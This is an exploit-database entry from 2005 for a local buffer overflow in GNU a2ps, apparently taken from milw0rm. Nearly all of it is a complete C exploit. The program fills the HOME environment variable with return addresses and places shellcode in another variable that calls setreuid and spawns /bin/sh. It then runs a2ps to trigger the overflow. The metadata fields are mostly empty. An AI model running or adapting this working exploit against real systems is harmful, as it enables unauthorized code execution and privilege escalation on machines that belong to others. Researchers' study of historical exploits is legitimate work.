GNU a2ps – Anything to PostScript Not SUID Local Overflow
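Vulnerability ID | 1054898 | Vulnerability type | |
Published | 2005-02-13 | Updated | 2005-02-13 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit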
```c
/* Not added to Local Non Poc section /str0ke */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() */
#include <unistd.h>   /* execl() */
#include <errno.h>

// by lizard / lizstyle[at]gmail.com
// greets go to slider/trog for helpin me
// not suid by default ;(

#define VULNTHING "/usr/bin/a2ps"
#define DEFRET 0xbffffffa - strlen(sc) - strlen(VULNTHING)
#define xnullbitch 1100

//i`m not a asm guru so i ripped this shellcode
//shellcode by man shadow
char sc[] =
    "\x31\xC9"              /* xor ecx,ecx */
    "\x31\xDB"              /* xor ebx,ebx */
    "\x6A\x46"              /* push byte 70 */
    "\x58"                  /* pop eax */
    "\xCD\x80"              /* int 80h */
    "\x51"                  /* push ecx */
    "\x68\x2F\x2F\x73\x68"  /* push 0x68732F2F */
    "\x68\x2F\x62\x69\x6E"  /* push 0x6E69622F */
    "\x89\xE3"              /* mov ebx,esp */
    "\x51"                  /* push ecx */
    "\x53"                  /* push ebx */
    "\x89\xE1"              /* mov ecx,esp */
    "\x99"                  /* cdq */
    "\xB0\x0B"              /* mov al,11 */
    "\xCD\x80";             /* int 80h */

int main(void) {
    int ctr = 0;
    char buffer[xnullbitch];

    fprintf(stdout, "[*] 0x%8x\n", (long) DEFRET);

    /* fill the whole buffer with the computed address, 4 bytes at a time */
    for(ctr = 0; ctr < xnullbitch - 1; ctr += 4)
        *(long *) &buffer[ctr] = (long) DEFRET;
    buffer[xnullbitch - 1] = '\0';   /* setenv() needs a terminated string */

    if((setenv("HOME", buffer, 1)) == -1) {
        perror("setenv()");
        exit(1);
    }
    if((setenv("TOPX", sc, 1)) == -1) {
        perror("setenv()");
        exit(1);
    }
    if((execl(VULNTHING, VULNTHING, NULL)) == -1) {
        perror("execl()");
        exit(1);
    }
    return(0);
}

// milw0rm.com [2005-02-13]
```